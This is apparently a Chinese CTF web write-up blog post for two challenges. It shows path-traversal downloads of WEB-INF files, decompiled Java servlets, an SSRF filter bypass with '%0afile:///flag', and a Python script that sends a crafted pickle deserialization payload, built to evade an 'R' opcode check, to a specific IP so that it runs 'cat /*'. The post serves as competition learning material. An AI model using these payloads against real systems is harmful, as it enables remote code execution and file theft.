第一届长城杯网络安全大赛web-wp


[toc]

java_url

任意文件下载:/download?filename=../../../../WEB-INF/web.xml,一依次下载三个文件,丢出一个poc:/download?filename=../../../../WEB-INF/classes/com/test2/aaa1/download.class

download.java

package com.test2.aaa1;

import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.URLEncoder;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class download extends HttpServlet {
    private static final long serialVersionUID = 1;

    /* access modifiers changed from: protected */
    public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        doPost(request, response);
    }

    /* access modifiers changed from: protected */
    public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        String fileName = request.getParameter("filename");
        if (fileName.contains("environ")) {
            response.getWriter().write("false");
            return;
        }
        String fileName2 = new String(fileName.getBytes("ISO8859-1"), "UTF-8");
        System.out.println("filename=" + fileName2);
        if (fileName2 == null || !fileName2.toLowerCase().contains("flag")) {
            String path = findFileSavePathByFileName(fileName2, getServletContext().getRealPath("/WEB-INF/upload"));
            if (!new File(path + "/" + fileName2).exists()) {
                request.setAttribute("message", "error");
                request.getRequestDispatcher("/message2.jsp").forward(request, response);
                return;
            }
            response.setHeader("content-disposition", "attachment;filename=" + URLEncoder.encode(fileName2.substring(fileName2.indexOf("_") + 1), "UTF-8"));
            FileInputStream in = new FileInputStream(path + "/" + fileName2);
            ServletOutputStream out = response.getOutputStream();
            byte[] buffer = new byte[1024];
            while (true) {
                int len = in.read(buffer);
                if (len > 0) {
                    out.write(buffer, 0, len);
                } else {
                    in.close();
                    out.close();
                    return;
                }
            }
        } else {
            request.setAttribute("message", "no no no ");
            request.getRequestDispatcher("/message2.jsp").forward(request, response);
        }
    }

    public String findFileSavePathByFileName(String filename, String saveRootPath) {
        int hashCode = filename.hashCode();
        String dir = saveRootPath + "/" + (hashCode & 15) + "/" + ((hashCode & 240) >> 4);
        File file = new File(dir);
        if (!file.exists()) {
            file.mkdirs();
        }
        return dir;
    }
}

testURL.java

package com.test2.aaa1;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class testURL extends HttpServlet {
    /* access modifiers changed from: protected */
    public void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doPost(req, resp);
    }

    /* access modifiers changed from: protected */
    public void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String tartget_url = req.getParameter("url");
        if (tartget_url.substring(0, tartget_url.indexOf(":")).matches("(?i)file|(?i)gopher|(?i)data")) {
            resp.getWriter().write(String.valueOf(new StringBuilder().append("false")));
        } else {
            resp.getWriter().write(String.valueOf(getContent(tartget_url)));
        }
    }

    public StringBuilder getContent(String url) throws IOException {
        BufferedReader in = new BufferedReader(new InputStreamReader(new URL(url).openConnection().getInputStream()));
        StringBuilder content = new StringBuilder();
        while (true) {
            String inputLine = in.readLine();
            if (inputLine == null) {
                return content;
            }
            content.append(inputLine);
            content.append("\n");
        }
    }
}

matches("(?i)file|(?i)gopher|(?i)data")过滤不严谨,/testURL?url=%0afile:///flag 即可绕过(团子 yyds)

ez_python

首届网刃杯工控ctf-ez-web 原题

源码提示:<!-- ?pic=1.jpg -->,任意文件读取喽,读出来是base64。先来一波 /proc/self/cmdline ,知道进程运行为 app.py ,有经验的师傅应该直接读app.py了,然后读取

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

app = Flask(__name__)

class User():
    def __init__(self,name,age):
        self.name = name
        self.age = age

def check(s):
    if b'R' in s:
        return 0
    return 1


@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except:
        username = "CTFer"
    pic = '{0}.jpg'.format(random.randint(1,7))

    try:
        pic=request.args.get('pic')
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()
    except:
        pic='{0}.jpg'.format(random.randint(1,7))
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()

    return render_template('index.html', uname=username, pic=p )


if __name__ == "__main__":
    app.run('0.0.0.0',port=8888)

pickle的反序列化:从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势

弹shell失败了,用了雪姐姐的脚本嘿嘿

import requests
import pickle
import base64


#e = 'ls / -a'
e = 'cat /*'
s = pickle.dumps(e)
# print(s)
payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \
    e.encode()+b' > /tmp/1.txt\nb.'
response = requests.get("http://116.62.239.41:4322/?pic=/tmp/1.txt",
cookies=dict(
    user=base64.b64encode(payload).decode()))
for l in response.content.decode().split("\n"):
    if "base64" in l:
        l = l.split("\"")[1].split(",")[1]
        print(base64.b64decode(l).decode())

文章作者: yq1ng
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yq1ng !
评论
  目录